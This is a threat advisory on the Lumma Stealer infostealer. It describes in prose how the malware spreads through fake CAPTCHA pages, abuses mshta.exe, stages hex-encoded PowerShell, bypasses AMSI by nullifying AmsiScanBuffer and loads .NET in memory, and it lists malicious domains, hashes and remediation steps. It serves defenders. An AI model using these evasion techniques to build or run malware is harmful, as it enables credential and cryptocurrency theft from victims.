Analysis Summary

Lumma Stealer, an advanced information-stealing malware operating under the Malware-as-a-Service (MaaS) model, has evolved significantly since its emergence in 2022. Believed to be developed by Russian-speaking threat actors, it is designed to exfiltrate sensitive user data, including credentials, browser cookies, cryptocurrency wallet information, and other personally identifiable information (PII). This malware has demonstrated remarkable adaptability in evading traditional detection mechanisms while targeting Windows systems. Distribution of LummaStealer largely relies on social engineering techniques, primarily phishing emails that redirect victims to deceptive CAPTCHA pages. Users are tricked into copying and executing malicious scripts in the Windows Run dialog box, silently deploying the initial stage of the payload.

According to the Researcher, a newly observed and particularly concerning infection vector abuses a legitimate Windows utility, mshta.exe, to execute remote code disguised as an .mp4 file. This technique aligns with MITRE ATT&CK technique T1218.005, exploiting trusted Windows binaries to bypass application control mechanisms and evade browser-based security restrictions. The fake .mp4 file is actually embedded with obfuscated JavaScript code and hexadecimal strings, which, once interpreted by mshta.exe, initiate a multi-stage infection sequence. This abuse of living-off-the-land binaries (LOLBins) allows attackers to remain under the radar and execute code outside the browser’s protection scope.

At the heart of this malware’s stealth is its sophisticated layered obfuscation. The JavaScript payload includes a variable—“Fygo”—which stores the hex-encoded second-stage PowerShell payload. This payload is decoded using a JavaScript eval() function that dynamically reconstructs and executes the PowerShell commands. Once executed, the PowerShell script deploys a third stage that incorporates a technique to bypass the Antimalware Scan Interface (AMSI). Specifically, it searches for and nullifies the “AmsiScanBuffer” function in memory, effectively disabling security scanning capabilities provided by clr.dll, a core component of the .NET runtime.

The final stage of the attack reveals a Base64-encoded .NET assembly loaded directly into memory through reflection, ensuring the malware remains non-resident and avoids generating disk-based artifacts. This fileless execution technique severely limits traditional antivirus and endpoint detection methods from identifying and stopping the malware. The use of these advanced capabilities suggests that the observed LummaStealer variant is part of the more expensive “Professional” or “Corporate” tiers of the MaaS offering, highlighting the rising sophistication and commercialization of cybercrime tools in the modern threat landscape.

Impact

• Sensitive Information Theft
• Crypto Theft
• Security Bypass
• Code Execution
• Gain Access

Indicators of Compromise

Domain Name

• klipderiq.shop
• check.qlkwr.com
• xian.klipderiq.shop
• simplerwebs.world
• affc.klipcewucyu.shop
• klipdiheqoe.shop
• heavens.holistic-haven.shop

IP

• 104.21.64.1

MD5

• cf11599333fed4ca46ce4ffa842a53bb
• c44b2e323b4164c50ca6a4f1d55c7504
• 6ea6215981cf69c355bc60c0061d52aa
• 8a08a5edc038f153574bea0d70203eef
• 30df5bd13b9666d14a13cdc7960803f5
• b775351f7a697d6deb1d440dc12d9761

SHA-256

• 02630fa994b1566ad1515fd87220fc037b967f07495985a3637d68d7e08c57ee

• 77f2a6a87fd5aca73be774e267907427277d863f335fea09ccfb4b693d5a0287

• b96542451f473e9f8231ae5a712c834c08c4cf90cd956201d72b953170c12de1

• 4ab874dc915b08dc3f59169ebd6cb3278f98cbfca4ebdaca69af07dd63279095

• 6a80253afc260c3966c662f519d3ce3da4ccfeaec1314083800c5097ec9cbd1f

• 4baabdbe96a16716454a62abd7a7105d8b3a775c2428a0052d9738b0412a32c6

SHA1

• ef85ba125184cbb92b3abf780fa9dbf0a1f1d4d0
• ded3ed8724e5913d341b3eaca9bd9f47f0e4a4a2
• 8bb8f2324aa1aca4da6fbea5cdaad4f66263b545
• 60e30eaeedc7abb079fd7e6d2d8f486de5a9af38
• 88958d7c9749b7d085ee28d9fa50151a505eba09
• b133d42502750817aa8e88119ff36158d2f8ecee

Affected Vendors

• Microsoft

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Block or tightly control the use of mshta.exe, powershell.exe, and other Living-off-the-Land Binaries (LOLBins) using Windows AppLocker or WDAC (Windows Defender Application Control).
• Implement advanced email filtering solutions to detect and block phishing attempts. Enable URL scanning and sandboxing for links and attachments.
• Conduct regular cybersecurity awareness training to educate users about social engineering tactics, such as fake CAPTCHA pages and suspicious script execution requests.
• Deploy EDR (Endpoint Detection and Response) solutions that can detect fileless malware behavior and monitor script execution in memory.
• Ensure AMSI (Antimalware Scan Interface) is enabled and use tools like Microsoft Defender for Endpoint to block scripts that attempt to tamper with AMSI functions.
• Monitor and restrict outbound connections to suspicious or unknown domains and IP addresses. Use DNS filtering to block known malicious domains.
• Perform regular threat hunting across environments to identify suspicious behavior patterns, such as mshta calling external URLs or PowerShell spawning from unusual processes.
• Ensure all operating systems and applications are updated with the latest security patches to minimize exploitable vulnerabilities.
• Enforce strong, unique passwords and use password managers. Consider using privileged access management (PAM) solutions for sensitive accounts.
• Use DLP (Data Loss Prevention) tools to monitor and prevent the unauthorized exfiltration of sensitive data from endpoints or servers.